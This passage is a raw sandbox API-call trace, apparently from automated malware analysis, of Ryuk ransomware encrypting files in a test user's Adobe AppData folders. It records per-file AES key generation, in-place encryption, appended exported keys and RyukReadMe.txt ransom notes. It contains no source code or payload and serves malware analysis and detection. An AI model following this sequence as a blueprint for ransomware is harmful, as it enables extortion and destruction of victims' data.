lpFileSize=0x29ab138*=42495) returned 1 [0144.039] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xa4dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.039] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.040] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.040] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.040] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.040] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.040] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa5ff, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xa5ff, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.041] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xa5ff, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xa600) returned 1 [0144.041] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.042] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa600, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xa600, lpOverlapped=0x0) returned 1 [0144.042] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.042] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.042] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.042] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.042] CloseHandle (hObject=0x198) returned 1 [0144.058] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.062] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.062] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.062] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.062] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.062] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages", dwFileAttributes=0x80) returned 1 [0144.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.063] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=8192) returned 1 [0144.063] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=8192) returned 1 [0144.063] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.063] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.064] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.064] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.064] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.064] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.064] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x2000, lpOverlapped=0x0) returned 1 [0144.065] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.065] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2010) returned 1 [0144.065] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.065] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x2010, lpOverlapped=0x0) returned 1 [0144.066] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.066] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.066] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.066] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.066] CloseHandle (hObject=0x198) returned 1 [0144.082] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.086] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.086] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.086] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.086] SetLastError (dwErrCode=0x0) [0144.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.086] GetLastError () returned 0x0 [0144.086] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0144.087] CloseHandle (hObject=0x198) returned 1 [0144.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0144.088] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.088] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0144.088] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0144.088] SetLastError (dwErrCode=0x0) [0144.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\search\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.088] GetLastError () returned 0x0 [0144.088] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0144.089] CloseHandle (hObject=0x198) returned 1 [0144.089] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0144.089] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0144.089] SetLastError (dwErrCode=0x0) [0144.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0144.090] GetLastError () returned 0xb7 [0144.090] CloseHandle (hObject=0x194) returned 1 [0144.090] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0144.090] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0144.090] SetLastError (dwErrCode=0x0) [0144.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.090] GetLastError () returned 0xb7 [0144.090] CloseHandle (hObject=0x190) returned 1 [0144.090] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.090] SetLastError (dwErrCode=0x0) [0144.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.090] GetLastError () returned 0xb7 [0144.090] CloseHandle (hObject=0x190) returned 1 [0144.090] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0144.090] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.090] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.090] SetLastError (dwErrCode=0x0) [0144.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0144.091] GetLastError () returned 0x0 [0144.091] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0144.091] CloseHandle (hObject=0x194) returned 1 [0144.091] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0144.092] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.092] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.092] SetLastError (dwErrCode=0x0) [0144.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.092] GetLastError () returned 0x0 [0144.092] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0144.093] CloseHandle (hObject=0x198) returned 1 [0144.093] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0144.094] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.094] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.094] SetLastError (dwErrCode=0x0) [0144.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.101] GetLastError () returned 0x0 [0144.101] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.102] CloseHandle (hObject=0x19c) returned 1 [0144.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.102] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.102] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.102] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.102] SetLastError (dwErrCode=0x0) [0144.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\all\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.102] GetLastError () returned 0x0 [0144.102] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.103] CloseHandle (hObject=0x19c) returned 1 [0144.103] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.103] SetLastError (dwErrCode=0x0) [0144.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.103] GetLastError () returned 0xb7 [0144.103] CloseHandle (hObject=0x19c) returned 1 [0144.104] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.104] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.104] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.104] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.104] SetLastError (dwErrCode=0x0) [0144.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.105] GetLastError () returned 0x0 [0144.105] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.106] CloseHandle (hObject=0x19c) returned 1 [0144.106] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.106] SetLastError (dwErrCode=0x0) [0144.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.106] GetLastError () returned 0xb7 [0144.106] CloseHandle (hObject=0x19c) returned 1 [0144.107] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.107] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.107] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.107] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.107] SetLastError (dwErrCode=0x0) [0144.107] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.108] GetLastError () returned 0x0 [0144.108] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.108] CloseHandle (hObject=0x19c) returned 1 [0144.108] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.108] SetLastError (dwErrCode=0x0) [0144.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.109] GetLastError () returned 0xb7 [0144.109] CloseHandle (hObject=0x19c) returned 1 [0144.109] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.109] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.109] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.109] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.109] SetLastError (dwErrCode=0x0) [0144.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dan\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.109] GetLastError () returned 0x0 [0144.109] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0144.110] CloseHandle (hObject=0x19c) returned 1 [0144.110] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0144.110] SetLastError (dwErrCode=0x0) [0144.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.110] GetLastError () returned 0xb7 [0144.110] CloseHandle (hObject=0x19c) returned 1 [0144.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0144.111] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0144.111] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0144.111] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0144.111] SetLastError (dwErrCode=0x0) [0144.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dut\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0144.112] 